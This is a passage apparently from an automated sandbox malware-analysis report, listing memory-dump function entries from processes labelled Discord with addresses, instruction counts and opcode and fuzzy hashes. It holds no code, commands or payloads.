                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1dcdd16438b6ddfee13cb1ece418e3f5c24f80c37f5ed2b1c373393c4eedd1fe
                                      • Instruction ID: cedacedf4fa756bd3a5a42e67a0cded8554f6996dfb2e2bd4f988094587d91fc
                                      • Opcode Fuzzy Hash: 1dcdd16438b6ddfee13cb1ece418e3f5c24f80c37f5ed2b1c373393c4eedd1fe
                                      • Instruction Fuzzy Hash: EB31D121B1C9490FE798EF6C9469679B2C2EFD8355F0546BEA05EC32E7DD24AC428341
                                      Function 00007FFD9B7D0D48 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                      • Instruction ID: 418a9ea806e1ccd207bb67409d9f687dd55e107c71b91ac69553623695c52f89
                                      • Opcode Fuzzy Hash: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                      • Instruction Fuzzy Hash: 87218415F1490A4BFB84BBBC546E7BC72D2EFD8715F504276E41DC32DADD28A8418392
                                      Function 00007FFD9B7D086D Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b1111266d1ee9574721b2d5fcf7ccb0531c108c3d25dccea98c2acd927cab506
                                      • Instruction ID: 551f81e130e01991e9cdb8f63af317adb5428c9c3348c89779b54f7e7e3498a2
                                      • Opcode Fuzzy Hash: b1111266d1ee9574721b2d5fcf7ccb0531c108c3d25dccea98c2acd927cab506
                                      • Instruction Fuzzy Hash: 97219F34B589494FD784EF68A0B19EDBF71AFC8300BA549E8E818C33CADD3869418B40
                                      Function 00007FFD9B7D2291 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 692284bf8073947c883380ce18c47777108c66124642f4e396995d1665d6e89f
                                      • Instruction ID: da6a6b01d45c4ea0a23b4244caa60b75067531b4dc4cf25f6adeca31b11993ec
                                      • Opcode Fuzzy Hash: 692284bf8073947c883380ce18c47777108c66124642f4e396995d1665d6e89f
                                      • Instruction Fuzzy Hash: 3E014754A0EB890FE7A1A6785C754757FE0CFD1391B0A07BBE888C60F7D8086B498392

                                      Executed Functions

                                      Function 00007FFD9B7E16E9 Relevance: .7, Instructions: 701COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d509e817fbbcec0c7515a2f80cc72f49c447a613064a246cd2704e255d0993fa
                                      • Instruction ID: 1a6754faa3fbd7bdab8ad5c25a466576fdb257282f99d7e7dcf3f3f47853deb3
                                      • Opcode Fuzzy Hash: d509e817fbbcec0c7515a2f80cc72f49c447a613064a246cd2704e255d0993fa
                                      • Instruction Fuzzy Hash: 2822A360B19A4D4FE798FB6C846ABB976D6FF98304F410579E00EC32E6DE28A8418745
                                      Function 00007FFD9B7E0E5E Relevance: .3, Instructions: 281COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 32961abd0791f8483ec627bf0cb41afd95b32a7f6aadf3860f26d79183715248
                                      • Instruction ID: b75d59a600d72db153bb2cb4ef9ad0de7805117f69a27d683bd08e912a6ec9a3
                                      • Opcode Fuzzy Hash: 32961abd0791f8483ec627bf0cb41afd95b32a7f6aadf3860f26d79183715248
                                      • Instruction Fuzzy Hash: B4711916F0D6D60EE356B77C68695F92BA1DFC622970981FBD0CDCA0E7DC0868478392
                                      Function 00007FFD9B7E07F2 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;N_$<N_^
                                      • API String ID: 0-579182416
                                      • Opcode ID: e33ca73e1d44f59fd01dab2638409b09f0c82d64b240b760bf70cd55bcd70c59
                                      • Instruction ID: ff93b337c7e9c3e58b3f62aceb567f6394478dad579ce313548d0b3871e67881
                                      • Opcode Fuzzy Hash: e33ca73e1d44f59fd01dab2638409b09f0c82d64b240b760bf70cd55bcd70c59
                                      • Instruction Fuzzy Hash: 05512636B0964D4FD304EBACA4A69E97BB4FFC421475145FAD058CB2DADD286842CB88
                                      Function 00007FFD9B7E11F2 Relevance: 1.8, Strings: 1, Instructions: 581COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2N_^
                                      • API String ID: 0-2962387604
                                      • Opcode ID: d2c66826138e38b49cddd43e4bd5cfb85bf0f475af0457ba60e2344eaabe849b
                                      • Instruction ID: bfc69c018194e3c7fccc91cdf5ca5394e8c8cd3797052f98c09c3ac9b9035000
                                      • Opcode Fuzzy Hash: d2c66826138e38b49cddd43e4bd5cfb85bf0f475af0457ba60e2344eaabe849b
                                      • Instruction Fuzzy Hash: 5B51F727F0969A4FD711E7ACA8765ED7F70EF85225B0A42F7C099DA1F3DD1424068390
                                      Function 00007FFD9B7E11F0 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2N_^
                                      • API String ID: 0-2962387604
                                      • Opcode ID: 582de223853282522399c3d4a6e5bf6c5ee0d4824afc465d29abcee3d058b178
                                      • Instruction ID: 9e00aa463d9763839bc3b2552372d756ff47b2c9f1afcc2b489aaf80a338e127
                                      • Opcode Fuzzy Hash: 582de223853282522399c3d4a6e5bf6c5ee0d4824afc465d29abcee3d058b178
                                      • Instruction Fuzzy Hash: 2F51F327F0969A4FD711E7ACA8765ED7B70EF81225B0A42F7C099DA1F3DC1824068380
                                      Function 00007FFD9B7E12B8 Relevance: .5, Instructions: 487COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee487462c19f83999c3a2cec92d6ee09b1fe9dd0632110c42f4836a5f58f131a
                                      • Instruction ID: 349a21333c92063750a572d10cc4965c6ad4071906afddf0d821fc6fa4fe0567
                                      • Opcode Fuzzy Hash: ee487462c19f83999c3a2cec92d6ee09b1fe9dd0632110c42f4836a5f58f131a
                                      • Instruction Fuzzy Hash: EA31C472A09A8E4FDB51DBACD8755EDBBB1FF85210F4602BAC049E72F6CD242905C740
                                      Function 00007FFD9B7E0AFB Relevance: .2, Instructions: 207COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86e2c738bd958126e835d73246f3a4ac02c28e5b8c8cf61fad08ef9df912bc46
                                      • Instruction ID: 40c26045088dfd0949058bf05c613f0d20cbd9892ae1cd778cdd3bce689d6a17
                                      • Opcode Fuzzy Hash: 86e2c738bd958126e835d73246f3a4ac02c28e5b8c8cf61fad08ef9df912bc46
                                      • Instruction Fuzzy Hash: 93510836F0965E8BDB04FBACA866AED73B1FFC4325B51427AD009C72E7CE2464418780
                                      Function 00007FFD9B7E0B6F Relevance: .2, Instructions: 160COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1694085a8c7708a4c103290e176ab5c42b717a9bcecf1e2ccdc8a9d6ff5d29cc
                                      • Instruction ID: fae4a66b25d0215550cf1d82377fe1917e89af176798fc1a8c71c1a23b57003d
                                      • Opcode Fuzzy Hash: 1694085a8c7708a4c103290e176ab5c42b717a9bcecf1e2ccdc8a9d6ff5d29cc
                                      • Instruction Fuzzy Hash: 8441C436B19A2E8FDB44FBACD865AED77A1FFC4315B41457AD009C7296CE346442C780
                                      Function 00007FFD9B7E0D48 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1d034d8cedad19002c4a6db81f6055205a8c9d47c232b94d8bbcd2bb06bbfb3f
                                      • Instruction ID: d1e19eb4b6cba8251263871df03ee25f4d220b6cbfc7f08c73937d2658222e5f
                                      • Opcode Fuzzy Hash: 1d034d8cedad19002c4a6db81f6055205a8c9d47c232b94d8bbcd2bb06bbfb3f
                                      • Instruction Fuzzy Hash: 0D219611F1490A4BFB84BBBC586E7BC72E2EF98715F504176E51DC32D7DE28A8414382
                                      Function 00007FFD9B7E086D Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 06160b1d12be0932a572feeb9d8220267d9f6b7a7b723f48a323aae11b653727
                                      • Instruction ID: 5b44f0e9fc334e17e6ac333f36c7116386e810abddbc4c88d8e5c814e5141f2e
                                      • Opcode Fuzzy Hash: 06160b1d12be0932a572feeb9d8220267d9f6b7a7b723f48a323aae11b653727
                                      • Instruction Fuzzy Hash: DC218035758A4D4FD744EB9CA0A69FEBF69BFC8200B8149ECD418C738ECD2869018B48